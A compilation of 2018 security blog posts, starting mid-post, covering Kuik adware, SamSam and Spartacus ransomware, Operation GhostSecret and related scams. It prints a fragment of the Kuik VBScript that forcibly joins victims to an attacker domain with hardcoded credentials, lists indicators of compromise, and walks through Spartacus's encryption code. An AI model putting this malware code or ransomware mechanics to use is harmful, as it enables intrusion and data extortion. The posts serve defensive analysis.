ReturnValue = objComputer.JoinDomainOrWorkGroup("kuikdelivery.com", "4sdOwt7b7L1vAKR6U7", "kuikdelivery.com\administrator", "OU=" & WScript.Arguments.Item(0) & ",DC=kuikdelivery,DC=com", JOIN_DOMAIN + ACCT_CREATE + DOMAIN_JOIN_IF_JOINED + JOIN_UNSECURE)
If (ReturnValue  0) Or (err.number  0) Then
  trackEvent "join-domain-failed", ReturnValue
  WScript.Quit 1
Else
  trackEvent "join-domain-success", Null
  WScript.Quit 0
End IF

Payloads

There are a range of payloads being used by this program, but bogus Chrome extensions seem to be a particular favorite. In addition, some coin miners are being served:

Removal

Malwarebytes users (version 3.x) can remove this threat from their system by running a full scan. The removal includes unjoining the malicious domain controller to restore your machine to its original state.

Indicators of compromise

Kuik

b9323268bf81778329b8316dec8f093fe71104f16921a1c9358f7ba69dd52686
990c019319fc18dca473ac432cdf4c36944b0bce1a447e85ace819300903a79e

Chrome extensions

d-and-h[.]com/fljlngkbcebmlpdlojnndahifaocnipb.crx
d-and-h[.]com/123.crx
d-and-h[.]com/jpfhjoeaokamkacafjdjbjllgkfkakca.crx
d-and-h[.]com/mmemdlochnielijcfpmgiffgkpehgimj.crx
kuikdelivery[.]com/emhifpfmcmoghejbfcbnknjjpifkmddc.crx
tripan[.]me/kdobijehckphahlmkohehaciojbpmdbp.crx

Payloads

92996D9E7275006AB6E59CF4676ACBB2B4C0E0DF59011347CE207B219CB2B751
33D86ABF26EFCDBD673DA5448C958863F384F4E3E678057D6FAB735968501268
7889CB16DB3922BEEFB7310B832AE0EF60736843F4AD9FB2BFE9D8B05E48BECD
761D62A22AE73307C679B096030BF0EEC93555E13DC820931519183CAA9F1B2A
871AD057247C023F68768724EBF23D00EF842F0B510A3ACE544A8948AE775712

The post Kuik: a simple yet annoying piece of adware appeared first on Malwarebytes Labs.

Despite Last Year’s Surge, Ransomware Attacks on the Decline in 2018

Although major, widespread campaigns such as WannaCry drove a 415 percent increase in ransomware attacks last year, recent research revealed that the threat vector is fading in 2018.

F-Secure’s “The Changing State of Ransomware” report found that the lack of big paydays for even the most headline-worthy campaigns has led to a gradual decline in these types of attacks. Users recognize that even paying up doesn’t guarantee the safe return of data.

Ransomware News Revolves Around WannaCry in 2017

2017 was an interesting year for ransomware. Strains such as Locky, Mole, Cerber and CryptoLocker remained popular and the number of new malware families increased by 62 percent to reach 343 strains worldwide last year. However, F-Secure Security Advisor Sean Sullivan noted that this type of activity began to taper off after last summer and that the “ransomware gold rush mentality is over.”

The exception was WannaCry, which accounted for 90 percent of all ransomware attacks reported in 2017. The first wave of these attacks was stifled by the discover of a kill switch. While this gave security professionals time to regroup, it didn’t stop subsequent infections because WannaCry spread like a worm across vulnerable SMB ports — the more hosts it infected, the greater its reach.

This not only bolstered second-wave WannaCry numbers, but it also led to the development of unique variations, some of which kept the worm qualities but ditched the encryption. F-secure noted that these variants made the impact “less noticeable for victims” but still caused problems “in the way of downtime and service outages due to the worm’s bandwidth consumption.”

Emerging Trends in Ransomware Attacks

The report also touched on emerging trends, such as the shift toward crypto-mining thanks to bitcoin value gains through 2017. Crypto-mining malware leverages unused central processing unit (CPU) cycles and “draws considerably less attention than ransomware,” according to the report. Attackers are also adjusting their aim and targeting corporate environments instead of individuals since enterprises offer better potential returns.

Finally, the report pointed out that while WannaCry — and, to a lesser extent, Locky — “dominate prevalence statistics,” they aren’t necessarily the most successful ransomware attacks. WannaCry only raked in around $140,000, but a unique Linux variant of the Erebus ransomware nabbed a $1 million payout for attackers last year from a South Korean web hosting firm.

The bottom line is that although WannaCry had the greatest reach and staying power in 2017, attackers are now shifting gears to create targeted corporate campaigns and leverage crypto-mining tools.

The post Despite Last Year’s Surge, Ransomware Attacks on the Decline in 2018 appeared first on Security Intelligence.

Anti-theft LoJack supposedly manipulated by Russian hackers to hijack computers

Security researchers from Arbor Networks’ ASERT lab have found that laptop recovery software LoJack appears to be used in a sophisticated, yet subtle, Russian state-sponsored attack scheme through remote code execution. The tool was created as an anti-theft program to remotely protect corporate information should computers be stolen.

Security solutions don’t flag the malware hidden in the installation as malware activity, which makes it easy for attackers to intercept the communication and get inside the computer.

Anyone with administrator privilege can use the software to locate and encrypt stolen computers, and delete information. Some devices have the tool by default.

“This is basically giving the attacker a foothold in an agency,” said in an interview with Dark Reading Richard Hummel, manager of threat research at NETSCOUT Arbor’s ASERT. “There’s no LoJack execution of files, but they could launch additional software at a later date.”

According to the report published on Tuesday, the Fancy Bear hacking group was manipulating the software to hack into a company’s network. Fancy Bear servers appear to have been communicating with a number of LoJack executables; “LoJack agents containing command and control (C2) domains likely associated with Fancy Bear operations,” reads the report.

“If they’re on a critical system or the user is someone with high privileges, then they have a direct line into the enterprise,” Hummel added, “with the permissions that LoJack requires, [the attackers] have permission to install whatever they want on the victims’ machines.”

It’s not yet clear how the malware payloads spread, but researchers believe the hackers used phishing techniques.

Fancy Bear has been widely covered in the news due to its strong association with Russian military intelligence and the attacks against the Democratic National Committee in the US.

"Best porno ever" Necurs spam

This spam (apparently from the Necurs botnet) promises much, but seems not to deliver. From:    Susanne@victimdomain.tld [Susanne@victimdomain.tld]Date:    4 May 2018, 10:22Subject:    Best porno everHi [redacted],Best gay,teen,animal porno everPlease click the following link to activate your account.hxxp:||46.161.40.145:3314Regards,Susanne The sender's name varies, but is always in the same

Cyber Security Roundup for April 2018

The fallout from the Facebook privacy scandal rumbled on throughout April and culminated with the closure of the company at the centre of the scandal, Cambridge Analytica.
Ikea was forced to shut down its freelance labour marketplace app and website 'TaskRabbit' following a 'security incident'. Ikea advised users of TaskRabbit to change their credentials if they had used them on other sites, suggesting a significant database compromise.

TSB bosses came under fire after a botch upgraded to their online banking system, which meant the Spanished owned bank had to shut down their online banking facility, preventing usage by over 5 million TSB customers. Cybercriminals were quick to take advantage of TSB's woes.

Great Western Railway reset the passwords of more than million customer accounts following a breach by hackers, US Sun Trust reported an ex-employee stole 1.5 million bank client records, an NHS website was defaced by hackers, and US Saks, Lord & Taylor had 5 million payment cards stolen after a staff member was successfully phished by a hacker.

The UK National Cyber Security Centre (NCSC) blacklist China's state-owned firm ZTE, warning UK telecom providers usage of ZTE's equipment could pose a national security risk. Interestingly BT formed a research and development partnership with ZTE in 2011 and had distributed ZTE modems. The NCSC, along with the United States government, released statements accusing Russian of large-scale cyber-campaigns, aimed at compromising vast numbers of the Western-based network devices.

IBM released the 2018 X-Force Report, a comprehensive report which stated for the second year in a row that the financial services sector was the most targeted by cybercriminals, typically by sophisticated malware i.e. Zeus, TrickBot, Gootkit. NTT Security released their 2018 Global Threat Intelligence Report, which unsurprisingly confirmed that ransomware attacks had increased 350% last year.  

A concerning report by the EEF said UK manufacturer IT systems are often outdated and highly vulnerable to cyber threats, with nearly half of all UK manufacturers already had been the victim of cybercrime. An Electropages blog questioned whether the boom in public cloud service adoption opens to the door cybercriminals.

Finally, it was yet another frantic month of security updates, with critical patches released by Microsoft, Adobe, Apple, Intel, Juniper, Cisco, and Drupal.

NEWS
AWARENESS, EDUCATION AND THREAT INTELLIGENCE
REPORTS

Securing Your Devices from Mobile Malware

As the world has gone mobile, so too have the cybercriminals. With users now spending an average of four hours a day on multiple mobile devices that store mountains of sensitive information, it’s no wonder that mobile malware has become one of the most effective ways to capture our money and data.

That’s probably why mobile malware increased by 46% in the last year, with new mobile threats like ransomware and ad click malware making our digital lives even more complicated.

Of course, risky apps remain the persistent threat. These days, even official app stores aren’t completely safe. For instance, McAfee noted a 30% increase in threat families found in the Google Play Store over the last year alone. These included fake versions of legitimate apps designed to steal personal information, and apps that signed users up for premium services without their consent, leaving them with hefty bills.

But one of the biggest threats we saw was the rise of cryptocurrencies miners. They can hide in the background of seemingly harmless apps, and use your device’s computing power to mine for Bitcoin and other digital currencies. This type of mobile malware can even cause your phone to overheat and stop functioning all together.

In addition to risky apps, dangers lurk when you connect your mobile devices to public Wi-Fi networks, which are often unsecured. Public networks, like those in hotels and airports, have become hunting grounds for cybercriminals who can set up fake Wi-Fi hotspots and use them to deliver malware. They can also potentially eavesdrop on your private data, including passwords and credit card numbers, as they are sent from your device to the router.

Finally, the explosion of devices known as the Internet of Things (IoT), which include IP cameras, interactive speakers, and smart appliances, offer another avenue of attack for the cybercriminals. Since these devices usually come with few security features, they can easily be hacked and used to spread malware to other more data-rich devices connected on the same network.

Given these escalating risks, it’s essential for mobile users to learn how to secure their mobile devices, and all the valuable information that they hold.

Tips for avoiding mobile malware: 

  1. Use Mobile Security—Make sure all your devices are protected from malware and other emerging mobile threats by using security software that can warn you about risky apps and dangerous links, as well as help you locate and lock down a missing device.
  2. Avoid Risky Apps—Stick to downloading highly-rated apps from official app stores. You should also check the app’s permissions to see how much of your private information the app is trying to access. Limit access to only what the app needs to function properly. For instance, a calculator app shouldn’t need your location or contact details.
  3. Choose Strong Passwords—A complicated, hard-to-guess password is your first line of defense when it comes to protecting your online accounts and information. You may want to consider using a password manager that generates strong passwords and keeps them in a secure vault so you don’t have to remember them all. Look into comprehensive security software that includes a password manager.
  4. Keep your IoT devices separate—Since many IoT devices have very low security, you may want to consider keeping them on a separate network from your smartphones, tablets, and computers since these usually contain private information. Read your router’s user manual to learn how to setup a second “guest” network. Or, you can invest in a router with built-in security that protects all the devices on the network.
  5. Stay Informed—Given our reliance on mobile devices, mobile malware is unlikely to go away anytime soon. Make sure you stay up-to-date on emerging threats and the steps you need to take to protect yourself.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post Securing Your Devices from Mobile Malware appeared first on McAfee Blogs.

SamSam ransomware: what you need to know

SamSam ransomware is a custom infection used in targeted attacks, often deployed using a wide range of exploits or brute-force tactics. Based on our own run-ins with the infection, we’ve observed that attacks were made on targets via vulnerable JBoss host servers during a previous wave of SamSam attacks in 2016 and 2017.

In 2018, SamSam uses either vulnerabilities in remote desktop protocols (RDP), Java-based web servers, or file transfer protocol (FTP) servers to gain access to the victims’ network or brute force against weak passwords to obtain an initial foothold. From there, the ransomware “fun and games” begin for the authors. For everyone else, it’s chaos.

The ties that bind

A common thread tying all of these attacks together is the use of the word “sorry” in ransom notes, URLs, and even infected files. It’s made hundreds of thousands of dollars so far, and it’s caused no end of trouble in the US for cities like Atlanta.

Here’s what a typical ransom splash screen looks like:

samsam ransom

The ransom note is quite interesting, giving the option of randomly-selected file encryption (if you don’t pay the full amount). They’ll also unlock one file for free as a token of trust that they will give your files back after payment. It reads as follows:

What happened to your files?

All your files encrypted with RSA-2048 encryption, for more information search in Google “RSA encryption”

How to recover files?

RSA is a asymmetric cryptographic algorithm, you need one key for encryption and one key for decryption so you need private key to recover your files. It’s not possible to recover your files without private key.

How to get private key?

You can get your private key in 3 easy steps:
1) You must send us 0.8 Bitcoin for each affected PC or 4.5 Bitcoins to receive all private keys for all affected PCs.
2) After you send us 0.8 Bitcoin, leave a comment on our site with this detail: just write your host name in your comment
3) We will reply to your comment with a decryption software, you should run it on your affected PC and all encrypted files will be recovered

With buying the first key you will find that we are honest

Ransomware authors rely on the victim viewing their odd code of “honesty” as important, or else nobody would dare to pay up.

I should also mention, before we go any further, that we do protect against this specific threat, which we detect as Ransom.Samas:

SamSam detection

The SamSam group have been making waves since late 2015, causing trouble in 2016, and starting to regularly increase the cost of their ransom in 2017. Colorado and Atlanta have both had run-ins with SamSam recently, as you may have seen from ongoing news coverage.

One would think SamSam has been around long enough for organizations to be able to deal with it effectively, but it’s still here, and still locking up machines in targeted attacks.

You can trace SamSam’s first2018 appearance in back to January. There’s “persistent” and then there’s SamSam.

January: Sorry, not sorry

Hospitals, city municipalities, and many more from Indiana to New Mexico were all struck down by SamSam in varying degrees of severity. A hospital in Indiana, in particular, was reduced to working with pen and paper in stormy weather. They decided to pay the ransom and get systems back up and running, given the cost of the fix was more than the ransom. This is an organization that had backups in place, unlike many other ransomware victims. All the same, by attacking a service offering life-saving treatment to patients, staff were left with few options.

Though you’ll find conflicting advice on paying the ransom, and while appreciating that every case is different, we generally advise not to do it. By handing over the cash, you’re giving the green light to the hackers to carry on doing it. If it works the first time, why not the second or third?

This is the already fraught situation healthcare professionals and departments responsible for day-to-day management of city services find themselves in as we head into February.

February: Slow traffic blues

In February, the Colorado Department of Transportation had to shut down 2,000 (non critical) systems as they, too, were hit by a SamSam outbreak. Bitcoin was once again what the hackers were after; the CDT decided that they weren’t going to pay up, but restore their backups instead.

March: Atlanta ransomware resurgent

All of the worst problems of SamSam effectively rolled into one large pile of misery for the city of Atlanta, who had a serious case of the SamSam blues:

https://platform.twitter.com/widgets.js

They were faced with the prospect of paying $6,800 per machine to unlock the encrypted files, or a cool $51,000 to recover everything across all compromised computers. As to how the attackers got in, one researcher noted a potential EternalBlue route:

https://platform.twitter.com/widgets.js

Regardless of the method used, the big problem here is that 10 days after initial infection, they were still struggling to get back to full strength, with no less than five out of 13 departments hit in the original malware blast. Just like the Indiana hospital staff were forced to use pen and paper, so too were law enforcement in Atlanta—and they also lost some police records in the bargain.

Note that three city council staffers had to work on a “clunky personal laptop.” So now we’re introducing personal machines onto a network dealing with potentially sensitive data, already hammered by opportunistic malware infections. One hopes that the machine had at least been checked for infections or potential vulnerabilities, but it would be surprising if the already busy IT staff checked if the employee had installed all security patches.

You could say the ransom was “only” $51,000—except the ransomware authors pulled the payment page and left Atlanta carrying the can. Ultimately, the SamSam outbreak cost the city of Atlanta a terrifying $2.6 million dollars to set a $50k infection right.

It isn’t just fixing some computers. There’s everything from forensics and insurance to extra staff and crisis comms to consider. This is the very real cost of attempting to recover from an infection—and that’s while trying to offer public-facing services potentially impacted by the attack.

Fighting ransomware

Ransomware may be experiencing a drop in popularity but make no mistake—the impact can be horrendous. As a reminder, here are some ways local governments and other organizations can fend off these attacks:

  • Backups are essential, and help to reduce some of the impact from a ransomware attack. A word of caution: your backups have to be logical and easy to implement if needed. All too often, organizations throw everything into a jumble of files and folders, with duplication galore and no real instructions as to where everything should go.
  • Staff training. It’s arguable that the automated systems in place should stop attacks long before reaching the human component of your network, but giving staff a crash course in security basics is always a good idea.
  • Spam filtering for email-based attacks (fake PDF invoices, booby-trapped Word documents insisting you enable Macros and the like).
  • Disable unnecessary exposed services facing the Internet, a time-honored way in for ransomware infections everywhere.
  • Change default/easy-to-guess passwords on all of your systems and services (not just the “important” ones, because ultimately someone will find their way in on the supposedly unimportant ones instead).
  • Choose your vendors wisely.

SamSam: not gone, and not forgotten

Money makes the world go round, and for SamSam their currency of choice is Bitcoin. Make no mistake, business is good; they’re estimated to have racked up around $850,000 in profit and they show no sign of slowing down. Consider that their estimated $850k profit is still nowhere near the cost of recovery for the City of Atlanta alone, and then take into account how much cleanup has cost for everyone else affected so far.

No matter your reason for being online, and regardless of which industry you operate in, I think we can all agree warding off an attack such as the ones above should be foremost in your mind when allocating a budget to security threats. SamSam isn’t going away anytime soon, and unfortunately the same can be said for other infections waiting to strike. It only takes one moment of inattentiveness, and you could be faced with some difficult decisions indeed.

Thanks to Marcelo for screenshots and additional information.

The post SamSam ransomware: what you need to know appeared first on Malwarebytes Labs.

Spartacus ransomware: introduction to a strain of unsophisticated malware

Spartacus ransomware is a new sample that has been circulating in 2018. Written in C#, the original sample is obfuscated, which we will go over as we extract it to its readable state.

Spartacus is a relatively straight-forward ransomware sample and uses some similar techniques and code to others we have seen in the past, such as ShiOne, Blackheart, and Satyr. However, there is no sure relationship between these samples and the actors. I mention it mainly to show that they share similar functionality and are basic in form.

In the case of Satyr and Blackheart, the code is nearly identical, with Spartacus following almost the same code flow with some modifications. If I were to make an assumption, I would say they are either the same actor or the actors for each of them used the same code. But again, there are no facts to prove this as of now.

In general, what we notice is that there is a string of these .NET ransomware popping up, all of them more or less the same or similar. It is just an easy form of ransomware that criminals are creating, as it obviously does not take much time or thought to make.

There is nothing impressive about them, in fact just the opposite. I would say they are boring at best. So why are we writing about one of them? The analysis of Spartacus can essentially be used as a base knowledge and reference for anyone analyzing variants of these basic .NET ransomware that they may come across in the future.

The two take aways from this article will be understanding the code in detail, and understanding how to get an obfuscated .NET sample into a readable state.

Spartacus

Before we begin, I want to mention one characteristic about Spartacus’ encryption method. Spartacus starts by generating a unique key for encryption done with the Rijndael algorithm. (The Rijndael algorithm is a version of AES.)

This key is saved and used to encrypt every single file, meaning that two identical files will have the same cipher-text. The AES key is encrypted with a RSA key embedded in the file. The cipher-text is encoded and shown to the user in the ransom note.

The fact that the RSA key is statically embedded in the ransomware implies that the private key exists on the server side of the ransomware author’s system. Thus, all AES keys from all victims of this particular strain can be decrypted using this one key if it is ever leaked.

As this ransomware is not extremely complex, we will go straight to the deep technical analysis and code walkthrough.

Unpacking

When we first open the sample of Spartacus in ILSpy, we see this:

The code of the functions is not visible and as you can see, everything is obfuscated. In these scenarios, I like to use a tool called de4dot. It will process the file and output a clean readable version. The -r flag is where you set the directory, which contains the obfuscated .NET sample.

This gives us the clean version, which we will be using for our analysis going forward.

Analysis

Let’s begin with the Main function shown below.

It starts by making sure there is only one instance of this malware running on the system. It does so by the CheckRunProgram function, which, among other things, creates a mutex and makes sure it is unique.

After this check is complete, it executes smethod_3 in a thread.

Before the smethod_3 begins, the constructor for this class gets automatically called now and sets up all the private members (variables), which include all special folders to search and encrypt. It also generates the AES key, which is unique to the victim, using the KeyGenerator.GetUniqueKey(133) function. The special folders can be viewed below and will be referenced throughout the ransomware to begin folder traversing.

The keygen function as I mentioned is GetUniqueKey(), the details of which are below. Essentially, it just creates a series of cryptographically strong random numbers using the RNGCryptoServiceProvider.GetNonZeroBytes API function. It then uses that series of random numbers as indexes to the character set
array = “abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890” to build a unique string of characters. This is the AES key, which will encrypt all files going forward.

Now that the constructor of the class has been initiated, let’s take a look at the smethod_3 function that was called.

This function iterates the list of special folders, which was generated in the constructor and begins its recursive traversal encrypting every file in the folders using the smethod_6 function. One thing I will note here is that the encryption loop does not discriminate file types or special files. It will encrypt everything it comes across. Also, you can see smethod_1 being called. This may be a leftover mistake of the programmer, as its output is not used anywhere in the program and is called later on when it’s time to display the encrypted key to the user.

As I mentioned, the smethod_6 function is the one doing all the encryption, but the smethod_5 function is the recursive function that will dig into each sub folder of whatever location it starts at, calling smethod_6 on each iteration to encrypt the files in that sub folder.

As you can see, it calls itself so that it will eventually cover every single sub folder. Then it calls smethod_6 to do the actual encryption, looping through every file in that folder.

This method iterates all files in the current folder. The only stipulation is that the file is not already encrypted. This is the portion here, which simply makes sure the extension is not already .Spartacus:

if (Path.GetExtension(text) == ".Spartacus")
{
 return;
}

If this check passes, it calls smethod_7, which does the file content rewriting with the encrypted version.

The function calls smethod_0, which encrypts the original file data, and then the next two lines write the encrypted data into the file and rename it with the .Spartacus extension. A quick note: Another sign that every single file is encrypted with the same key is that this ransomware does not write the encrypted AES key into the file, which we see in other ransomware that perform unique file encryptions.

As you can see here, it uses the Rijndael method—AES using ECB mode. The key that was generated in the constructor is hashed with MD5, and that is actually what is used as the key itself.

Now we have gone through the whole process for file encryption on the main file system, through all the sub functions called inside of the parent function smethod_3.

Let’s go back to the main function now to the next line, which calls smethod_4():

smethod_4 basically performs exactly the same set of recursive function calls as we saw in smethod_3, however, rather than looping through special folders, it is now iterating over all logical drives that are attached to the system. So all external or mapped drives will be encrypted as well.

We do not need to go through all these details now as we have already covered their functionality, being that they are identical to the earlier function calls. The only thing I will mention is that smethod_6 is called twice. This is done most likely to speed up the encryption by having it run on two threads.

Back to main: the next and final important function call is:

Application.Run(new Form1());

This will display the ransom note to the user and show the encrypted AES key in the ransom note.

It starts by calling smethod_1(). As I mentioned above, this simply takes the AES key, which was generated at the beginning and encrypts it using the hard-coded public RSA key.

public static string smethod_1()
{
 return Convert.ToBase64String(Class1.smethod_2("<RSAKeyValue><Modulus>xA4fTMirLDPi4rnQUX1GNvHC41PZUR/fDIbHnNBtpY0w2Qc4H2HPaBsKepU33RPXN5EnwGqQ5lhFaNnLGnwYjo7w6OCkU+q0dRev14ndx44k1QACTEz4JmP9VGSia6SwHPbD2TdGJsqSulPkK7YHPGlvLKk4IYF59fUfhSPiWleURYiD50Ll2YxkGxwqEYVSrkrr7DMnNRId502NbxrLWlAVk/XE2KLvi0g9B1q2Uu/PVrUgcxX+4wu9815Ia8dSgYBmftxky427OUoeCC4jFQWjEJlUNE8rvQZO5kllCvPDREvHd42nXIBlULvZ8aiv4b7NabWH1zcd2buYHHyGLQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>", Encoding.UTF8.GetBytes(Class2.smethod_0())));
}

The RSA key is hard coded and embedded into the ransomware, which means that the author has generated the private key in advance on his side.

It then iterates all drives and writes the ransom note there. Finally, it opens the ransom note displaying the message and the RSA-encrypted AES key, which will be used by the victim in order to decrypt.

After all of this, the final thing it does is call smethod_0, which deletes shadow volumes in order to prevent the user from using as a Windows restore point.

This ransomware is purely offline in that there are no network communications back to the author or any C2 server. The ransomware author does not know who he has infected until they email him with their personal ID, which is the AES key. This also means that the decryption tool the author will send is likely embedded with the AES key, which unfortunately will be unique to the specific victim.

There is nothing special or innovative about this sample, but that does not mean it is not dangerous. It will still do its job—at the moment there is no decryptor for this. The only slight possibility to save yourself if you realize you are being hit with this malware is to perform a process memory dump, in which case there is a slight possibility of extracting the keys from memory.

In general, it is always a good idea to perform a memory dump of any malware on your system before killing the process in the slight chance that some keys can be recovered.

The post Spartacus ransomware: introduction to a strain of unsophisticated malware appeared first on Malwarebytes Labs.

Far Cry 5 download offers: embrace the power of “no”

The recently released Far Cry 5 is a video game where you reclaim Montana from a cult obsessed with the “power of yes” by hitting members over the head with a shovel. It’s also one of the biggest sellers for publisher Ubisoft to date, and it stands to reason that many people would like to grab a copy for free.

It’s been a while since we saw a wave of YouTube vids promising free games all based around one title, but this is definitely one of those moments given the huge popularity of its shovel-throwing hero.

In the past week or so, we’ve seen videos galore, all offering downloads or sign ups or sign ups and downloads (novel!), with a couple of heart-warming flashbacks to our somewhat off-the-boil friend, the survey scam (and a couple of download sites, too). The standard operating procedure for these kinds of scams means they’re reliant on here today, gone tomorrow videos so the view count typically varies between half a dozen and thousands upon thousands. Not all of them get taken down, so it’s possible to drive huge numbers to the final destination.

Here’s a typical example:

Youtube video

Click to enlarge

Nothing says old school like “poorly typing out instructions in Notepad while giving you a tour of my desktop.” That one leads to a site called oceanofgames(dot)com, which itself offers up a variety of download links:

multiple downloads

Clicking the blue button takes you to solvettube(dot)com, which serves up a similar number of links/adverts, and offers up a roughly 40GB download after hitting the page. The download kept failing for us so we can’t tell you what it is, but caveat emptor (with the additional caveat in your caveat by pointing out you’re not actually buying anything here).

Next up, we have someone filming their TV screen for what looks like a promo for a console version. The site being promoted here is fc5(dot)gamereach(dot)net, and we’ll come back to that one later.

Another Youtube video

Click to enlarge

The next video is pretty ugly looking, and features hideous gigantic text over a web browser. Having said that, people likely to fall for these things probably couldn’t care less what the video looks like.

youtube video 3

Click to enlarge

The other videos knocking around all follow the same pattern; crudely thrown together video, lots of text to ensure it gets picked up in searches, and the suggestion that you should get over there quick before the offer expires.

First, we’ll check out fr5(dot)yourunlocker(dot)org, which is your standard survey unlocker website.

unlocker with surveys

Click to enlarge

Select your platform, hit the verify button, and:

survey time

Lots of surveys to choose from. Here’s one site we ended up on—a sign up for something to do with “unlimited movies.”

movie sign up

Click to enlarge

One of the other websites is a lot slicker and involves a fair bit of hoop jumping to get anywhere (and by “anywhere” I mean “a survey page”). It’s the one located at fc5(dot)gamereach(dot)net that we mentioned earlier.

It’s presented as some sort of pretend post-crowdfunding campaign page by someone claiming to be a team of game developers. The implication is, I guess, that they worked on Far Cry 5. It’s a bit of an odd line to take because it certainly wasn’t crowdfunded.

goals page

Click to enlarge

Thanks to you we were able to reach our goals! And with this little project we’ll lessen the strain on your wallets! One free game at a time! Dev. Andrey

From the FAQ page:

How?

How are you able to give out a great game like this for free?

…if you followed our crowdfunding campaign, you should know that we got way past our set goal, and with the additional support and money, we were able to create a game which far exceeded our expectations, and we even have money left to spare, and with those, we decided to release this small project as an additional token of appreciation to all our supporters

Apparently, a game with a development budget of between $80 to $130 million dollars is a “small project” these days.

This one is all about submitting your email address and an “access code.” They claim you had to have contributed to their indie campaign to get your hands on one, but it doesn’t matter—the code is posted underneath the “console promo” YouTube video near the start of this blog.

submit information?

Click to enlarge

Enter your access code

Enter your email

Select your platform

Then they perform some checks. No, really:

checking...

Click to enlarge

After this, there’s messages about them needing to confirm you’re a human and not a bot (flimsy justification for popping survey questions the world over), followed by survey-style options leading to mobile-centric offers.

almost done

Click to enlarge

offer time!

Click to enlarge

The other sites currently floating around act in much the same way; time-sensitive offer, not a bot verification, and lots of offers, downloads, and surveys to wade through before a total lack of free video game action. There’s no end to them. Here’s a screenshot filtered to just the last few hours of uploads:

endless uploads

Click to enlarge

Claims of DRM free downloads, or dubious cracks, are also rife. More often than not, downloading a supposedly unofficial copy of the game will just lead to headaches, especially where dabbling with game cracks is concerned. Malware is probably going to pay you a visit at some point, and then you’ll definitely need something more technical than a throwable shovel to solve the problem.

As much as you may wish to take down the evil cult plaguing Montana,the more sensible course of action is to wait until a game sale pops up.

Forget the power of yes; it’s time to embrace the power of no, and steer clear of download offers.

The post Far Cry 5 download offers: embrace the power of “no” appeared first on Malwarebytes Labs.

Global Malware Campaign Pilfers Data from Critical Infrastructure, Entertainment, Finance, Health Care, and Other Industries

McAfee Advanced Threat Research analysts have uncovered a global data reconnaissance campaign assaulting a wide number of industries including critical infrastructure, entertainment, finance, health care, and telecommunications. This campaign, dubbed Operation GhostSecret, leverages multiple implants, tools, and malware variants associated with the state-sponsored cyber group Hidden Cobra. The infrastructure currently remains active. (For an extensive analysis by the Advanced Threat Research team, see “Analyzing Operation GhostSecret: Attack Seeks to Steal Data Worldwide.”

The campaign is extremely complicated, leveraging a number of implants to steal information from infected systems and is intricately designed to evade detection and deceive forensic investigators. The implants vary considerably and although they share some functionality and code, they are categorized as different families. As McAfee Advanced Threat Research analysts investigated this campaign, we recognized many similarities to indicators used in the 2014 Sony Pictures attack.

A portion of this campaign aimed at the Turkish financial sector using the Bankshot implant was recently discovered by McAfee Advanced Threat Research analysts. This appears to have been the initial stage of Operation GhostSecret, as within days of publication, new attacks appeared  beyond the financial sector. Between March 14 and 18, we observed the data reconnaissance implant in organizations across 17 countries.

Delving further into this campaign reveals a narrow list of organizations across the globe; the threat actors have been explicit about who can connect from which IP address. Reviewing the WHOIS information for these IP addresses shows us that there is some correlation in geography, although there are no additional clues why these addresses were used.

As we monitor this campaign, it is clear that the publicity associated with the (we assume) first phase of this campaign did nothing to slow the attacks. The threat actors not only continued but also increased the scope of the attack, both in types of targets and in the tools they used. We try to avoid using the word sophisticated because it is both subjective and overused. Nonetheless, the attackers have significant capabilities, demonstrated by their tools development and the pace at which they operate.

Fighting cybercrime is a global effort best undertaken through effective partnerships between the public and private sectors. McAfee is working with Thai government authorities to take down the control server infrastructure of Operation GhostSecret, while preserving the systems involved for further analysis by law enforcement authorities. By creating and maintaining partnerships with worldwide law enforcement, McAfee demonstrates that we are stronger together.

The post Global Malware Campaign Pilfers Data from Critical Infrastructure, Entertainment, Finance, Health Care, and Other Industries appeared first on McAfee Blogs.

Analyzing Operation GhostSecret: Attack Seeks to Steal Data Worldwide

McAfee Advanced Threat Research analysts have uncovered a global data reconnaissance campaign assaulting a wide number of industries including critical infrastructure, entertainment, finance, health care, and telecommunications. This campaign, dubbed Operation GhostSecret, leverages multiple implants, tools, and malware variants associated with the state-sponsored cyber group Hidden Cobra. The infrastructure currently remains active. In this post, we dive deeply into this campaign. For a brief overview of this threat, see “Global Malware Campaign Pilfers Data from Critical Infrastructure, Entertainment, Finance, Health Care, and Other Industries.”

Our investigation into this campaign reveals that the actor used multiple malware implants, including an unknown implant with capabilities similar to Bankshot. From March 18 to 26 we observed the malware operating in multiple areas of the world. This new variant resembles parts of the Destover malware, which was used in the 2014 Sony Pictures attack.

Furthermore, the Advanced Threat Research team has discovered Proxysvc, which appears to be an undocumented implant. We have also uncovered additional control servers that are still active and associated with these new implants. Based on our analysis of public and private information from submissions, along with product telemetry, it appears Proxysvc was used alongside the 2017 Destover variant and has operated undetected since mid-2017.

The attackers behind Operation GhostSecret used a similar infrastructure to earlier threats, including SSL certificates used by FakeTLS in implants found in the Destover backdoor variant known as Escad, which was used in the Sony Pictures attack. Based on our technical analysis, telemetry, and data from submissions, we can assert with high confidence that this is the work of the Hidden Cobra group. The Advanced Threat Research team uncovered activity related to this campaign in March 2018, when the actors targeted Turkish banks. These initial findings appear to be the first stage of Operation GhostSecret. For more on the global aspect of this threat, see “Global Malware Campaign Pilfers Data from Critical Infrastructure of Entertainment, Finance, Health Care, and Other Industries.”

Analysis

The McAfee Advanced Threat Research team discovered a previously unknown data-gathering implant that surfaced in mid-February 2018. This implant appears to be a derivative of implants authored before by Hidden Cobra and contains functionality similar to that of Bankshot, with code overlaps from other Hidden Cobra implants. However, the variant is not based on Bankshot. Our analysis of the portable executable’s rich-header data reveals that the two implants were compiled in different development environments. (The PE rich header is an undocumented part of a Windows executable that reveals unique information to identify the Microsoft compiler and linker used to create the program. It is helpful for identifying similarities between malware variants to establish common development environments.) Our analysis of the code and PE rich header indicates that Bankshot, Proxysvc, and the Destover-like implant are distinct families, but also contain overlapping code and functionality with current tools of Hidden Cobra.

PE rich header data from the 2018 Bankshot implant.

PE rich header data from the new February 2018 implant.

PE rich header data from Proxysvc.dll.

